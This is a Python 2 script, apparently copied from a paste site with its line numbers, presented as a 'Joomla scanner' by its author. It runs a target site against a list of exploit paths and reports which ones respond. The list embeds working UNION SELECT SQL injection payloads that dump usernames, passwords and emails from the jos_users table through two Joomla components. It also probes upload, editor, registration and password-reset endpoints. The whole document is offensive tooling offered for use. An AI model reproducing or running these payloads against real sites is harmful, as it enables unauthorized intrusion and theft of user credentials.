#python sc4nn3r Joomla

1. #!/usr/bin/python
2. # By Kro0oz
3.  
4.  
5.  
6.  
7. import sys,urllib2,time,httplib
8.  
9.  
10.  
11. mtucx = 5
12.  
13.  
14.  
15. dzx = 4
16.  
17. logo = '''
18.  
19.  
20.  
21.  
22. __  __      _  __           ___             ____   ___  _____
23. |  \/  |    | |/ /          / _ \          |___ \ / _ \| ____|
24. | \ / |_ __| ' / _ __ ___ | | | | ___ ____   __) | | | | |__  
25. | |\/| | '__|  < | '__/ _ \| | | |/ _ \_  /  |__ <| | | |___ \
26. | |  | | | _| . \| | | (_) | |_| | (_) / / _ ___) | |_| |___) |
27. |_|  |_|_|(_)_|\_\_|  \___/ \___/ \___/___(_)____/ \___/|____/
28.      
29.    
30.                         -Joomla scanner #By ~ Kro0oz
31.                                                            
32.  
33.                                      
34.  
35.  
36.  
37. '''
38.  
39.  
40.  
41. print(logo)
42.  
43.  
44.  
45. print "Joomla Scanner "
46.  
47.  
48.  
49. print "Greetz to : dexter "
50.  
51.  
52.  
53. print "pyhthon joomla.py www.test.com"
54.  
55.  
56.  
57.  
58.  
59.  
60.  
61. BAD_RESP = [400,401,404]
62.  
63.  
64.  
65.  
66.  
67.  
68.  
69. def main(path):
70.  
71.  
72.  
73.     print "Scan:",host.split("/",1)[1]+path
74.  
75.  
76.  
77.     try:
78.  
79.  
80.  
81.         h = httplib.HTTP(host.split("/",1)[0])
82.  
83.  
84.  
85.         h.putrequest("HEAD", "/"+host.split("/",1)[1]+path)
86.  
87.  
88.  
89.         h.putheader("Host", host.split("/",1)[0])
90.  
91.  
92.  
93.         h.endheaders()
94.  
95.  
96.  
97.         resp, reason, headers = h.getreply()
98.  
99.  
100.  
101.         return resp, reason, headers.get("Server")
102.  
103.  
104.  
105.     except(), msg:
106.  
107.  
108.  
109.         print "Error Occurred:",msg
110.  
111.  
112.  
113.         pass
114.  
115.  
116.  
117.  
118.  
119.  
120.  
121. def timer():
122.  
123.  
124.  
125.     now = time.localtime(time.time())
126.  
127.  
128.  
129.     return time.asctime(now)
130.  
131.  
132.  
133.  
134.  
135.  
136.  
137. dzx = { "index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,2,concat%28username,0x3a,password,0x3a,email%29,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--" : ["com_idoblog"], "index.php?option=com_ignitegallery&task=view&gallery=-4+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--" : ["com_ignitegallery"], "index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=" : ["com_media"], "administrator/components/com_redmystic/chart/tmp-upload-images/" : ["com_redmystic"], "index.php?option=com_users&view=registration" : ["com_user"], "index.php?option=com_jce" : ["JCE","link"], "index.php?option=com_user&view=reset&layout=confirm" : ["com_user"], "index.php?option=com_smartformer":["com_smartformer"],"index.php?option=com_garyscookbook&func=newItem":["com_garyscookbook"],"index.php/component/osproperty/?task=agent_register":["com_osproperty"]}
138.  
139.  
140.  
141.  
142.  
143.  
144.  
145. if len(sys.argv) != 2:
146.  
147.  
148.  
149.     sys.exit(1)
150.  
151.  
152.  
153.  
154.  
155.  
156.  
157. host = sys.argv[1].replace("http://","").rsplit("/",1)[0]
158.  
159.  
160.  
161. if host[-1] != "/":
162.  
163.  
164.  
165.     host = host+"/"
166.  
167.  
168.  
169.    
170.  
171.  
172.  
173. print "\nTarget:",host
174.  
175.  
176.  
177. print "\nScanning Exploit\n"
178.  
179.  
180.  
181. for xpl,(poc) in dzx.items():
182.  
183.  
184.  
185.     resp,reason,server = main(xpl)
186.  
187.  
188.  
189.     if resp not in BAD_RESP:
190.  
191.  
192.  
193.         print ""
194.  
195.  
196.  
197.         print "\nResult:",resp, reason
198.  
199.  
200.  
201.         print "\nVuln",poc
202.  
203.  
204.  
205.     else:
206.  
207.  
208.  
209.         print ""
210.  
211.  
212.  
213.         print "\nResult:",resp, reason
214.  
215.  
216.  
217.         print
218.  
219.  
220.  
221. print "\nEnd\n"